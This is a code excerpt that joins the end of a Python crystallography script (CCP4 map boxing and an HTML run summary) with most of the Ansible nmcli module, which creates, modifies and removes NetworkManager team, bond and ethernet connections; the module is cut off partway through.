os.remove('mi_fft.log')
if fragcenter == 'none':
xyz_limits = 'BORDER ' + str(int(border))
else:
# Obtain box coordinates
xmin_x = x_center - border
xmin_y = y_center
xmin_z = z_center
ymin_x = x_center
ymin_y = y_center - border
ymin_z = z_center
zmin_x = x_center
zmin_y = y_center
zmin_z = z_center - border
xmax_x = x_center + border
xmax_y = y_center
xmax_z = z_center
ymax_x = x_center
ymax_y = y_center + border
ymax_z = z_center
zmax_x = x_center
zmax_y = y_center
zmax_z = z_center + border
xmin = a11*xmin_x + a12*xmin_y + a13*xmin_z
ymin = a21*ymin_x + a22*ymin_y + a23*ymin_z
zmin = a31*zmin_x + a32*zmin_y + a33*zmin_z
xmax = a11*xmax_x + a12*xmax_y + a13*xmax_z
ymax = a21*ymax_x + a22*ymax_y + a23*ymax_z
zmax = a31*zmax_x + a32*zmax_y + a33*zmax_z
xmin = round(xmin,4)
ymin = round(ymin,4)
zmin = round(zmin,4)
xmax = round(xmax,4)
ymax = round(ymax,4)
zmax = round(zmax,4)
xmin = str(xmin)
ymin = str(ymin)
zmin = str(zmin)
xmax = str(xmax)
ymax = str(ymax)
zmax = str(zmax)
xyz_limits = 'XYZLIM ' + xmin + ' ' + xmax + ' ' + ymin + ' ' + ymax + ' ' + zmin + ' ' + zmax
# Use CCP4/MAPMASK to box out required region
file = open('mi_mapmask.inp','w')
file.write(xyz_limits)
file.write('\n')
file.write('EXTEND XTAL\n')
file.write('END\n')
file.close()
runmapmask = 'mapmask MAPIN mi_2ff.map XYZIN ' + pdbfile_local + ' MAPOUT ' + mapout_local + ' < mi_mapmask.inp > mi_mapmask.log'
os.system(runmapmask)
if not os.path.exists(mapout_local):
print 'CCP4/MAPMASK for target site failed'
time.sleep(4)
return 1
else:
os.remove('mi_mapmask.inp')
os.remove('mi_mapmask.log')
os.remove('mi_2ff.map')
print 'Map of target region',mapout_local
###################################
# Append content to HTML summary #
###################################
if bngsummary != 'none':
# Learn information from project history
read_ref_summary = 'no'
refine_resolution = '?'
refine_rwork = '?'
refine_rfree = '?'
error_list_path= '?'
project_history_path = os.path.join(workingdir,'project_history.txt')
file = open(project_history_path,'r')
allLines = file.readlines()
file.close()
for eachLine in allLines:
# Parse for refinement information
if eachLine.find('Job ID:') > -1 and eachLine.find('refine_') > -1:
read_ref_summary = 'yes'
if eachLine.find('Summary:') > -1 and read_ref_summary == 'yes':
refine_summary = eachLine[16:100]
aLine = refine_summary.split()
number_args = len(aLine)
if number_args > 3:
refine_rwork = aLine[0]
refine_rwork = refine_rwork.replace('Rwork=','')
refine_rfree = aLine[1]
refine_rfree = refine_rfree.replace('Rfree=','')
refine_resolution = aLine[3]
refine_resolution = refine_resolution.replace('Resolution=','')
read_ref_summary = 'no'
if eachLine.find('Output error list:') > -1 and read_ref_summary == 'yes':
error_list_path = eachLine[18:200]
error_list_path = error_list_path.strip()
# Setup summary data and links
run_id_link = runcount + 1
run_id_link = str(run_id_link)
filename = bngsummaryfile
file = open(filename,'a')
# Link to history file
file.write('<td><a href = "file:///')
file.write(project_history_path)
file.write('">')
file.write(run_id_link)
file.write('</a></td>\n')
# Resolution
file.write('<td>')
file.write(refine_resolution)
file.write('</td>\n')
# Rw
file.write('<td>')
file.write(refine_rwork)
file.write('</td>\n')
# Rf
file.write('<td>')
file.write(refine_rfree)
file.write('</td>\n')
# Error list link
file.write('<td><a href = "file:///')
file.write(error_list_path)
file.write('">')
file.write(run_id_link)
file.write('</a></td>\n')
# Working directory name and link
file.write('<td><a href = "file:///')
file.write(workingdir)
file.write('">')
file.write(workingdir)
file.write('</a></td></tr>\n')
file.close()
# End of structure solution
# End of loop
runcount = runcount + 1
# Close out HTML summary
if bngsummary != 'none':
runtime = time.ctime(time.time())
filename = bngsummaryfile
file = open(filename,'a')
file.write('</table>')
file.write('<p>\n')
file.write('<b>Job End: ')
file.write(runtime)
file.write('</b><p>\n')
file.write('</body>\n')
file.write('</html>\n')
file.close()
#######################################
# Launch MIFIT option for single runs #
#######################################
if number_datasets == 1 and launch_mifit == 'yes':
os.chdir(workingdir)
print '\nMIFIT LAUNCH'
os.execl(mifitinstall,mlw_file,mlw_file)
#
return 0
if __name__ == "__main__":
sys.exit(Run())
|
gpl-3.0
|
gptech/ansible
|
lib/ansible/modules/net_tools/nmcli.py
|
12
|
41936
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Chris Long <[email protected]> <[email protected]>
#
# This file is a module for Ansible that interacts with Network Manager
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION='''
---
module: nmcli
author: "Chris Long (@alcamie101)"
short_description: Manage Networking
requirements: [ nmcli, dbus, NetworkManager-glib ]
version_added: "2.0"
description:
- Manage the network devices. Create, modify, and manage, ethernet, teams, bonds, vlans etc.
options:
state:
required: True
choices: [ present, absent ]
description:
- Whether the device should exist or not, taking action if the state is different from what is stated.
autoconnect:
required: False
default: "yes"
choices: [ "yes", "no" ]
description:
- Whether the connection should start on boot.
- Whether the connection profile can be automatically activated
conn_name:
required: True
description:
- 'Where conn_name will be the name used to call the connection. when not provided a default name is generated: <type>[-<ifname>][-<num>]'
ifname:
required: False
default: conn_name
description:
- Where IFNAME will be the what we call the interface name.
- interface to bind the connection to. The connection will only be applicable to this interface name.
- A special value of "*" can be used for interface-independent connections.
- The ifname argument is mandatory for all connection types except bond, team, bridge and vlan.
type:
required: False
choices: [ ethernet, team, team-slave, bond, bond-slave, bridge, vlan ]
description:
- This is the type of device or network connection that you wish to create.
mode:
required: False
choices: [ "balance-rr", "active-backup", "balance-xor", "broadcast", "802.3ad", "balance-tlb", "balance-alb" ]
default: balence-rr
description:
- This is the type of device or network connection that you wish to create for a bond, team or bridge.
master:
required: False
default: None
description:
- master <master (ifname, or connection UUID or conn_name) of bridge, team, bond master connection profile.
ip4:
required: False
default: None
description:
- 'The IPv4 address to this interface using this format ie: "192.0.2.24/24"'
gw4:
required: False
description:
- 'The IPv4 gateway for this interface using this format ie: "192.0.2.1"'
dns4:
required: False
default: None
description:
- 'A list of upto 3 dns servers, ipv4 format e.g. To add two IPv4 DNS server addresses: ["192.0.2.53", "198.51.100.53"]'
ip6:
required: False
default: None
description:
- 'The IPv6 address to this interface using this format ie: "abbe::cafe"'
gw6:
required: False
default: None
description:
- 'The IPv6 gateway for this interface using this format ie: "2001:db8::1"'
dns6:
required: False
description:
- 'A list of upto 3 dns servers, ipv6 format e.g. To add two IPv6 DNS server addresses: ["2001:4860:4860::8888 2001:4860:4860::8844"]'
mtu:
required: False
default: 1500
description:
- The connection MTU, e.g. 9000. This can't be applied when creating the interface and is done once the interface has been created.
- Can be used when modifying Team, VLAN, Ethernet (Future plans to implement wifi, pppoe, infiniband)
primary:
required: False
default: None
description:
- This is only used with bond and is the primary interface name (for "active-backup" mode), this is the usually the 'ifname'
miimon:
required: False
default: 100
description:
- This is only used with bond - miimon
downdelay:
required: False
default: None
description:
- This is only used with bond - downdelay
updelay:
required: False
default: None
description:
- This is only used with bond - updelay
arp_interval:
required: False
default: None
description:
- This is only used with bond - ARP interval
arp_ip_target:
required: False
default: None
description:
- This is only used with bond - ARP IP target
stp:
required: False
default: None
description:
- This is only used with bridge and controls whether Spanning Tree Protocol (STP) is enabled for this bridge
priority:
required: False
default: 128
description:
- This is only used with 'bridge' - sets STP priority
forwarddelay:
required: False
default: 15
description:
- This is only used with bridge - [forward-delay <2-30>] STP forwarding delay, in seconds
hellotime:
required: False
default: 2
description:
- This is only used with bridge - [hello-time <1-10>] STP hello time, in seconds
maxage:
required: False
default: 20
description:
- This is only used with bridge - [max-age <6-42>] STP maximum message age, in seconds
ageingtime:
required: False
default: 300
description:
- This is only used with bridge - [ageing-time <0-1000000>] the Ethernet MAC address aging time, in seconds
mac:
required: False
default: None
description:
- >
This is only used with bridge - MAC address of the bridge
(note: this requires a recent kernel feature, originally introduced in 3.15 upstream kernel)
slavepriority:
required: False
default: 32
description:
- This is only used with 'bridge-slave' - [<0-63>] - STP priority of this slave
path_cost:
required: False
default: 100
description:
- This is only used with 'bridge-slave' - [<1-65535>] - STP port cost for destinations via this slave
hairpin:
required: False
default: yes
description:
- This is only used with 'bridge-slave' - 'hairpin mode' for the slave, which allows frames to be sent back out through the slave the
frame was received on.
vlanid:
required: False
default: None
description:
- This is only used with VLAN - VLAN ID in range <0-4095>
vlandev:
required: False
default: None
description:
- This is only used with VLAN - parent device this VLAN is on, can use ifname
flags:
required: False
default: None
description:
- This is only used with VLAN - flags
ingress:
required: False
default: None
description:
- This is only used with VLAN - VLAN ingress priority mapping
egress:
required: False
default: None
description:
- This is only used with VLAN - VLAN egress priority mapping
'''
EXAMPLES='''
# These examples are using the following inventory:
#
# ## Directory layout:
#
# |_/inventory/cloud-hosts
# | /group_vars/openstack-stage.yml
# | /host_vars/controller-01.openstack.host.com
# | /host_vars/controller-02.openstack.host.com
# |_/playbook/library/nmcli.py
# | /playbook-add.yml
# | /playbook-del.yml
# ```
#
# ## inventory examples
# ### groups_vars
# ```yml
# ---
# #devops_os_define_network
# storage_gw: "192.0.2.254"
# external_gw: "198.51.100.254"
# tenant_gw: "203.0.113.254"
#
# #Team vars
# nmcli_team:
# - conn_name: tenant
# ip4: '{{ tenant_ip }}'
# gw4: '{{ tenant_gw }}'
# - conn_name: external
# ip4: '{{ external_ip }}'
# gw4: '{{ external_gw }}'
# - conn_name: storage
# ip4: '{{ storage_ip }}'
# gw4: '{{ storage_gw }}'
# nmcli_team_slave:
# - conn_name: em1
# ifname: em1
# master: tenant
# - conn_name: em2
# ifname: em2
# master: tenant
# - conn_name: p2p1
# ifname: p2p1
# master: storage
# - conn_name: p2p2
# ifname: p2p2
# master: external
#
# #bond vars
# nmcli_bond:
# - conn_name: tenant
# ip4: '{{ tenant_ip }}'
# gw4: ''
# mode: balance-rr
# - conn_name: external
# ip4: '{{ external_ip }}'
# gw4: ''
# mode: balance-rr
# - conn_name: storage
# ip4: '{{ storage_ip }}'
# gw4: '{{ storage_gw }}'
# mode: balance-rr
# nmcli_bond_slave:
# - conn_name: em1
# ifname: em1
# master: tenant
# - conn_name: em2
# ifname: em2
# master: tenant
# - conn_name: p2p1
# ifname: p2p1
# master: storage
# - conn_name: p2p2
# ifname: p2p2
# master: external
#
# #ethernet vars
# nmcli_ethernet:
# - conn_name: em1
# ifname: em1
# ip4: '{{ tenant_ip }}'
# gw4: '{{ tenant_gw }}'
# - conn_name: em2
# ifname: em2
# ip4: '{{ tenant_ip1 }}'
# gw4: '{{ tenant_gw }}'
# - conn_name: p2p1
# ifname: p2p1
# ip4: '{{ storage_ip }}'
# gw4: '{{ storage_gw }}'
# - conn_name: p2p2
# ifname: p2p2
# ip4: '{{ external_ip }}'
# gw4: '{{ external_gw }}'
# ```
#
# ### host_vars
# ```yml
# ---
# storage_ip: "192.0.2.91/23"
# external_ip: "198.51.100.23/21"
# tenant_ip: "203.0.113.77/23"
# ```
## playbook-add.yml example
---
- hosts: openstack-stage
remote_user: root
tasks:
- name: install needed network manager libs
yum:
name: '{{ item }}'
state: installed
with_items:
- NetworkManager-glib
- libnm-qt-devel.x86_64
- nm-connection-editor.x86_64
- libsemanage-python
- policycoreutils-python
##### Working with all cloud nodes - Teaming
- name: try nmcli add team - conn_name only & ip4 gw4
nmcli:
type: team
conn_name: '{{ item.conn_name }}'
ip4: '{{ item.ip4 }}'
gw4: '{{ item.gw4 }}'
state: present
with_items:
- '{{ nmcli_team }}'
- name: try nmcli add teams-slave
nmcli:
type: team-slave
conn_name: '{{ item.conn_name }}'
ifname: '{{ item.ifname }}'
master: '{{ item.master }}'
state: present
with_items:
- '{{ nmcli_team_slave }}'
###### Working with all cloud nodes - Bonding
- name: try nmcli add bond - conn_name only & ip4 gw4 mode
nmcli:
type: bond
conn_name: '{{ item.conn_name }}'
ip4: '{{ item.ip4 }}'
gw4: '{{ item.gw4 }}'
mode: '{{ item.mode }}'
state: present
with_items:
- '{{ nmcli_bond }}'
- name: try nmcli add bond-slave
nmcli:
type: bond-slave
conn_name: '{{ item.conn_name }}'
ifname: '{{ item.ifname }}'
master: '{{ item.master }}'
state: present
with_items:
- '{{ nmcli_bond_slave }}'
##### Working with all cloud nodes - Ethernet
- name: nmcli add Ethernet - conn_name only & ip4 gw4
nmcli:
type: ethernet
conn_name: '{{ item.conn_name }}'
ip4: '{{ item.ip4 }}'
gw4: '{{ item.gw4 }}'
state: present
with_items:
- '{{ nmcli_ethernet }}'
## playbook-del.yml example
- hosts: openstack-stage
remote_user: root
tasks:
- name: try nmcli del team - multiple
nmcli:
conn_name: '{{ item.conn_name }}'
state: absent
with_items:
- conn_name: em1
- conn_name: em2
- conn_name: p1p1
- conn_name: p1p2
- conn_name: p2p1
- conn_name: p2p2
- conn_name: tenant
- conn_name: storage
- conn_name: external
- conn_name: team-em1
- conn_name: team-em2
- conn_name: team-p1p1
- conn_name: team-p1p2
- conn_name: team-p2p1
- conn_name: team-p2p2
# To add an Ethernet connection with static IP configuration, issue a command as follows
- nmcli:
conn_name: my-eth1
ifname: eth1
type: ethernet
ip4: 192.0.2.100/24
gw4: 192.0.2.1
state: present
# To add an Team connection with static IP configuration, issue a command as follows
- nmcli:
conn_name: my-team1
ifname: my-team1
type: team
ip4: 192.0.2.100/24
gw4: 192.0.2.1
state: present
autoconnect: yes
# Optionally, at the same time specify IPv6 addresses for the device as follows:
- nmcli:
conn_name: my-eth1
ifname: eth1
type: ethernet
ip4: 192.0.2.100/24
gw4: 192.0.2.1
ip6: '2001:db8::cafe'
gw6: '2001:db8::1'
state: present
# To add two IPv4 DNS server addresses:
- nmcli:
conn_name: my-eth1
dns4:
- 192.0.2.53
- 198.51.100.53
state: present
# To make a profile usable for all compatible Ethernet interfaces, issue a command as follows
- nmcli:
ctype: ethernet
name: my-eth1
ifname: '*'
state: present
# To change the property of a setting e.g. MTU, issue a command as follows:
- nmcli:
conn_name: my-eth1
mtu: 9000
type: ethernet
state: present
# Exit Status's:
# - nmcli exits with status 0 if it succeeds, a value greater than 0 is
# returned if an error occurs.
# - 0 Success - indicates the operation succeeded
# - 1 Unknown or unspecified error
# - 2 Invalid user input, wrong nmcli invocation
# - 3 Timeout expired (see --wait option)
# - 4 Connection activation failed
# - 5 Connection deactivation failed
# - 6 Disconnecting device failed
# - 7 Connection deletion failed
# - 8 NetworkManager is not running
# - 9 nmcli and NetworkManager versions mismatch
# - 10 Connection, device, or access point does not exist.
'''
# import ansible.module_utils.basic
import os
import sys
HAVE_DBUS=False
try:
import dbus
HAVE_DBUS=True
except ImportError:
pass
HAVE_NM_CLIENT=False
try:
from gi.repository import NetworkManager, NMClient
HAVE_NM_CLIENT=True
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
class Nmcli(object):
"""
This is the generic nmcli manipulation class that is subclassed based on platform.
A subclass may wish to override the following action methods:-
- create_connection()
- delete_connection()
- modify_connection()
- show_connection()
- up_connection()
- down_connection()
All subclasses MUST define platform and distribution (which may be None).
"""
platform='Generic'
distribution=None
if HAVE_DBUS:
bus=dbus.SystemBus()
# The following is going to be used in dbus code
DEVTYPES={1: "Ethernet",
2: "Wi-Fi",
5: "Bluetooth",
6: "OLPC",
7: "WiMAX",
8: "Modem",
9: "InfiniBand",
10: "Bond",
11: "VLAN",
12: "ADSL",
13: "Bridge",
14: "Generic",
15: "Team"
}
STATES={0: "Unknown",
10: "Unmanaged",
20: "Unavailable",
30: "Disconnected",
40: "Prepare",
50: "Config",
60: "Need Auth",
70: "IP Config",
80: "IP Check",
90: "Secondaries",
100: "Activated",
110: "Deactivating",
120: "Failed"
}
def __init__(self, module):
self.module=module
self.state=module.params['state']
self.autoconnect=module.params['autoconnect']
self.conn_name=module.params['conn_name']
self.master=module.params['master']
self.ifname=module.params['ifname']
self.type=module.params['type']
self.ip4=module.params['ip4']
self.gw4=module.params['gw4']
self.dns4=module.params['dns4']
self.ip6=module.params['ip6']
self.gw6=module.params['gw6']
self.dns6=module.params['dns6']
self.mtu=module.params['mtu']
self.stp=module.params['stp']
self.priority=module.params['priority']
self.mode=module.params['mode']
self.miimon=module.params['miimon']
self.downdelay=module.params['downdelay']
self.updelay=module.params['updelay']
self.arp_interval=module.params['arp_interval']
self.arp_ip_target=module.params['arp_ip_target']
self.slavepriority=module.params['slavepriority']
self.forwarddelay=module.params['forwarddelay']
self.hellotime=module.params['hellotime']
self.maxage=module.params['maxage']
self.ageingtime=module.params['ageingtime']
self.mac=module.params['mac']
self.vlanid=module.params['vlanid']
self.vlandev=module.params['vlandev']
self.flags=module.params['flags']
self.ingress=module.params['ingress']
self.egress=module.params['egress']
def execute_command(self, cmd, use_unsafe_shell=False, data=None):
return self.module.run_command(cmd, use_unsafe_shell=use_unsafe_shell, data=data)
def merge_secrets(self, proxy, config, setting_name):
try:
# returns a dict of dicts mapping name::setting, where setting is a dict
# mapping key::value. Each member of the 'setting' dict is a secret
secrets=proxy.GetSecrets(setting_name)
# Copy the secrets into our connection config
for setting in secrets:
for key in secrets[setting]:
config[setting_name][key]=secrets[setting][key]
except Exception as e:
pass
def dict_to_string(self, d):
# Try to trivially translate a dictionary's elements into nice string
# formatting.
dstr=""
for key in d:
val=d[key]
str_val=""
add_string=True
if isinstance(val, dbus.Array):
for elt in val:
if isinstance(elt, dbus.Byte):
str_val+="%s " % int(elt)
elif isinstance(elt, dbus.String):
str_val+="%s" % elt
elif isinstance(val, dbus.Dictionary):
dstr+=self.dict_to_string(val)
add_string=False
else:
str_val=val
if add_string:
dstr+="%s: %s\n" % ( key, str_val)
return dstr
def connection_to_string(self, config):
# dump a connection configuration to use in list_connection_info
setting_list=[]
for setting_name in config:
setting_list.append(self.dict_to_string(config[setting_name]))
return setting_list
# print ""
def bool_to_string(self, boolean):
if boolean:
return "yes"
else:
return "no"
def list_connection_info(self):
# Ask the settings service for the list of connections it provides
bus=dbus.SystemBus()
service_name="org.freedesktop.NetworkManager"
proxy=bus.get_object(service_name, "/org/freedesktop/NetworkManager/Settings")
settings=dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
connection_paths=settings.ListConnections()
connection_list=[]
# List each connection's name, UUID, and type
for path in connection_paths:
con_proxy=bus.get_object(service_name, path)
settings_connection=dbus.Interface(con_proxy, "org.freedesktop.NetworkManager.Settings.Connection")
config=settings_connection.GetSettings()
# Now get secrets too; we grab the secrets for each type of connection
# (since there isn't a "get all secrets" call because most of the time
# you only need 'wifi' secrets or '802.1x' secrets, not everything) and
# merge that into the configuration data - To use at a later stage
self.merge_secrets(settings_connection, config, '802-11-wireless')
self.merge_secrets(settings_connection, config, '802-11-wireless-security')
self.merge_secrets(settings_connection, config, '802-1x')
self.merge_secrets(settings_connection, config, 'gsm')
self.merge_secrets(settings_connection, config, 'cdma')
self.merge_secrets(settings_connection, config, 'ppp')
# Get the details of the 'connection' setting
s_con=config['connection']
connection_list.append(s_con['id'])
connection_list.append(s_con['uuid'])
connection_list.append(s_con['type'])
connection_list.append(self.connection_to_string(config))
return connection_list
def connection_exists(self):
# we are going to use name and type in this instance to find if that connection exists and is of type x
connections=self.list_connection_info()
for con_item in connections:
if self.conn_name==con_item:
return True
def down_connection(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# if self.connection_exists():
cmd.append('con')
cmd.append('down')
cmd.append(self.conn_name)
return self.execute_command(cmd)
def up_connection(self):
cmd=[self.module.get_bin_path('nmcli', True)]
cmd.append('con')
cmd.append('up')
cmd.append(self.conn_name)
return self.execute_command(cmd)
def create_connection_team(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating team interface
cmd.append('con')
cmd.append('add')
cmd.append('type')
cmd.append('team')
cmd.append('con-name')
if self.conn_name is not None:
cmd.append(self.conn_name)
elif self.ifname is not None:
cmd.append(self.ifname)
cmd.append('ifname')
if self.ifname is not None:
cmd.append(self.ifname)
elif self.conn_name is not None:
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ip4')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('gw4')
cmd.append(self.gw4)
if self.ip6 is not None:
cmd.append('ip6')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('gw6')
cmd.append(self.gw6)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
return cmd
def modify_connection_team(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying team interface
cmd.append('con')
cmd.append('mod')
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ipv4.address')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('ipv4.gateway')
cmd.append(self.gw4)
if self.dns4 is not None:
cmd.append('ipv4.dns')
cmd.append(self.dns4)
if self.ip6 is not None:
cmd.append('ipv6.address')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('ipv6.gateway')
cmd.append(self.gw6)
if self.dns6 is not None:
cmd.append('ipv6.dns')
cmd.append(self.dns6)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
# Can't use MTU with team
return cmd
def create_connection_team_slave(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating team-slave interface
cmd.append('connection')
cmd.append('add')
cmd.append('type')
cmd.append(self.type)
cmd.append('con-name')
if self.conn_name is not None:
cmd.append(self.conn_name)
elif self.ifname is not None:
cmd.append(self.ifname)
cmd.append('ifname')
if self.ifname is not None:
cmd.append(self.ifname)
elif self.conn_name is not None:
cmd.append(self.conn_name)
cmd.append('master')
if self.conn_name is not None:
cmd.append(self.master)
# if self.mtu is not None:
# cmd.append('802-3-ethernet.mtu')
# cmd.append(self.mtu)
return cmd
def modify_connection_team_slave(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying team-slave interface
cmd.append('con')
cmd.append('mod')
cmd.append(self.conn_name)
cmd.append('connection.master')
cmd.append(self.master)
if self.mtu is not None:
cmd.append('802-3-ethernet.mtu')
cmd.append(self.mtu)
return cmd
def create_connection_bond(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating bond interface
cmd.append('con')
cmd.append('add')
cmd.append('type')
cmd.append('bond')
cmd.append('con-name')
if self.conn_name is not None:
cmd.append(self.conn_name)
elif self.ifname is not None:
cmd.append(self.ifname)
cmd.append('ifname')
if self.ifname is not None:
cmd.append(self.ifname)
elif self.conn_name is not None:
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ip4')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('gw4')
cmd.append(self.gw4)
if self.ip6 is not None:
cmd.append('ip6')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('gw6')
cmd.append(self.gw6)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
if self.mode is not None:
cmd.append('mode')
cmd.append(self.mode)
if self.miimon is not None:
cmd.append('miimon')
cmd.append(self.miimon)
if self.downdelay is not None:
cmd.append('downdelay')
cmd.append(self.downdelay)
if self.downdelay is not None:
cmd.append('updelay')
cmd.append(self.updelay)
if self.downdelay is not None:
cmd.append('arp-interval')
cmd.append(self.arp_interval)
if self.downdelay is not None:
cmd.append('arp-ip-target')
cmd.append(self.arp_ip_target)
return cmd
def modify_connection_bond(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying bond interface
cmd.append('con')
cmd.append('mod')
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ipv4.address')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('ipv4.gateway')
cmd.append(self.gw4)
if self.dns4 is not None:
cmd.append('ipv4.dns')
cmd.append(self.dns4)
if self.ip6 is not None:
cmd.append('ipv6.address')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('ipv6.gateway')
cmd.append(self.gw6)
if self.dns6 is not None:
cmd.append('ipv6.dns')
cmd.append(self.dns6)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
return cmd
def create_connection_bond_slave(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating bond-slave interface
cmd.append('connection')
cmd.append('add')
cmd.append('type')
cmd.append('bond-slave')
cmd.append('con-name')
if self.conn_name is not None:
cmd.append(self.conn_name)
elif self.ifname is not None:
cmd.append(self.ifname)
cmd.append('ifname')
if self.ifname is not None:
cmd.append(self.ifname)
elif self.conn_name is not None:
cmd.append(self.conn_name)
cmd.append('master')
if self.conn_name is not None:
cmd.append(self.master)
return cmd
def modify_connection_bond_slave(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying bond-slave interface
cmd.append('con')
cmd.append('mod')
cmd.append(self.conn_name)
cmd.append('connection.master')
cmd.append(self.master)
return cmd
def create_connection_ethernet(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating ethernet interface
# To add an Ethernet connection with static IP configuration, issue a command as follows
# - nmcli: name=add conn_name=my-eth1 ifname=eth1 type=ethernet ip4=192.0.2.100/24 gw4=192.0.2.1 state=present
# nmcli con add con-name my-eth1 ifname eth1 type ethernet ip4 192.0.2.100/24 gw4 192.0.2.1
cmd.append('con')
cmd.append('add')
cmd.append('type')
cmd.append('ethernet')
cmd.append('con-name')
if self.conn_name is not None:
cmd.append(self.conn_name)
elif self.ifname is not None:
cmd.append(self.ifname)
cmd.append('ifname')
if self.ifname is not None:
cmd.append(self.ifname)
elif self.conn_name is not None:
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ip4')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('gw4')
cmd.append(self.gw4)
if self.ip6 is not None:
cmd.append('ip6')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('gw6')
cmd.append(self.gw6)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
return cmd
def modify_connection_ethernet(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying ethernet interface
# To add an Ethernet connection with static IP configuration, issue a command as follows
# - nmcli: name=add conn_name=my-eth1 ifname=eth1 type=ethernet ip4=192.0.2.100/24 gw4=192.0.2.1 state=present
# nmcli con add con-name my-eth1 ifname eth1 type ethernet ip4 192.0.2.100/24 gw4 192.0.2.1
cmd.append('con')
cmd.append('mod')
cmd.append(self.conn_name)
if self.ip4 is not None:
cmd.append('ipv4.address')
cmd.append(self.ip4)
if self.gw4 is not None:
cmd.append('ipv4.gateway')
cmd.append(self.gw4)
if self.dns4 is not None:
cmd.append('ipv4.dns')
cmd.append(self.dns4)
if self.ip6 is not None:
cmd.append('ipv6.address')
cmd.append(self.ip6)
if self.gw6 is not None:
cmd.append('ipv6.gateway')
cmd.append(self.gw6)
if self.dns6 is not None:
cmd.append('ipv6.dns')
cmd.append(self.dns6)
if self.mtu is not None:
cmd.append('802-3-ethernet.mtu')
cmd.append(self.mtu)
if self.autoconnect is not None:
cmd.append('autoconnect')
cmd.append(self.bool_to_string(self.autoconnect))
return cmd
def create_connection_bridge(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating bridge interface
return cmd
def modify_connection_bridge(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying bridge interface
return cmd
def create_connection_vlan(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for creating ethernet interface
return cmd
def modify_connection_vlan(self):
cmd=[self.module.get_bin_path('nmcli', True)]
# format for modifying ethernet interface
return cmd
def create_connection(self):
cmd=[]
if self.type=='team':
# cmd=self.create_connection_team()
if (self.dns4 is not None) or (self.dns6 is not None):
cmd=self.create_connection_team()
self.execute_command(cmd)
cmd=self.modify_connection_team()
self.execute_command(cmd)
cmd=self.up_connection()
return self.execute_command(cmd)
elif (self.dns4 is None) or (self.dns6 is None):
cmd=self.create_connection_team()
return self.execute_command(cmd)
elif self.type=='team-slave':
if self.mtu is not None:
cmd=self.create_connection_team_slave()
self.execute_command(cmd)
cmd=self.modify_connection_team_slave()
self.execute_command(cmd)
# cmd=self.up_connection()
return self.execute_command(cmd)
else:
cmd=self.create_connection_team_slave()
return self.execute_command(cmd)
elif self.type=='bond':
if (self.mtu is not None) or (self.dns4 is not None) or (self.dns6 is not None):
cmd=self.create_connection_bond()
self.execute_command(cmd)
cmd=self.modify_connection_bond()
self.execute_command(cmd)
cmd=self.up_connection()
return self.execute_command(cmd)
else:
cmd=self.create_connection_bond()
return self.execute_command(cmd)
elif self.type=='bond-slave':
cmd=self.create_connection_bond_slave()
elif self.type=='ethernet':
if (self.mtu is not None) or (self.dns4 is not None) or (self.dns6 is not None):
cmd=self.create_connection_ethernet()
self.execute_command(cmd)
cmd=self.modify_connection_ethernet()
self.execute_command(cmd)
cmd=self.up_connection()
return self.execute_command(cmd)
else:
cmd=self.create_connection_ethernet()
return self.execute_command(cmd)
elif self.type=='bridge':
cmd=self.create_connection_bridge()
elif self.type=='vlan':
cmd=self.create_connection_vlan()
return self.execute_command(cmd)
def remove_connection(self):
# self.down_connection()
cmd=[self.module.get_bin_path('nmcli', True)]
cmd.append('con')
cmd.append('del')
cmd.append(self.conn_name)
return self.execute_command(cmd)
def modify_connection(self):
cmd=[]
if self.type=='team':
cmd=self.modify_connection_team()
elif self.type=='team-slave':
cmd=self.modify_connection_team_slave()
elif self.type=='bond':
cmd=self.modify_connection_bond()
